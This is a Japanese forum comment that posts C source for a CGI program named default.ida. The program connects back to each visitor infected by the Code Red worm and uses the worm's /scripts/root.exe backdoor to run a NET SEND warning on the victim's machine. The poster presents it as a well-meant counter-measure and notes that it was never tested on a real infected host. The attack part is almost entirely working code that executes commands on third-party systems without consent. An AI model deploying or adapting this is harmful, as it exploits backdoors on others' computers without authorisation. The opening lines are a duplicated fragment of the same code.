/* Messge to popup */
char msg[] = "NET SEND localhost \"***WARNING*** Your computer seems to be cracked by Code Red III. This message has been sent thru the backdoor of it. So, YOU MUST CLEAN UP YOUR SYSTEM. For more information, please check the following URL: http://www.incidents.org/react/code_red.php\"\r\n";
struct sockaddr_in addr;
struct hostent *host;
int open_sock(int sock, char *server, int port)
{
struct sockaddr_in addr;
struct hostent *dest;
Re:back door (スコア:2, 興味深い)
うーん、被感染サーバを持っていないので、本物でテストしてないけど、こんなところでいいのかな?
著作権主張もしません。
char msg[] = の所は改行を入れずに書いてね。
>モデレータの方、もしこういうコード公開がまずかったら削除してください。
/* messaging defult.ida for Code Red III */
/* Tested on Linux 2.2 with libc5 */
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
/* backdoor port */
#define WWW 80
/* backdoor command */
#define CMD "POST /scripts/root.exe HTTP/1.0\r\nContent-Length: %d\r\n\r\n"
char buf[1024];
/* Messge to popup */
char msg[] = "NET SEND localhost \"***WARNING*** Your computer seems to be cracked by Code Red III. This message has been sent thru the backdoor of it. So, YOU MUST CLEAN UP YOUR SYSTEM. For more information, please check the following URL: http://www.incidents.org/react/code_red.php\"\r\n";
struct sockaddr_in addr;
struct hostent *host;
int open_sock(int sock, char *server, int port)
{
struct sockaddr_in addr;
struct hostent *dest;
bzero((char *)&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(server);
addr.sin_port = htons(port);
if ((dest = gethostbyname(server)) != NULL) {
bcopy(dest->h_addr, (char *)&addr.sin_addr, dest->h_length);
}
else if ((addr.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return (-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
perror("connect()");
close(sock);
return (-2);
}
return 0;
}
int main(int argc, char *argv[])
{
int s;
int l;
char *remote_addr;
/* CGI response header */
printf("Location: http://www.microsoft.com/\n\n"); /* Redirect :-) */
/* Check remote addr */
if ((remote_addr = getenv("REMOTE_ADDR")) == NULL) {
exit(0);
}
/* Open socket */
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
exit(0);
}
if (open_sock(s, remote_addr, WWW) < 0) {
exit(0);
}
/* Make request */
l = snprintf(buf, sizeof(buf), CMD, strlen(msg));
/* Send Request */
send(s, buf, l, 0); /* POST Command / Length Header */
send(s, msg, strlen(msg), 0); /* Message */
/* Close */
close(s);
return 0;
}
kaokun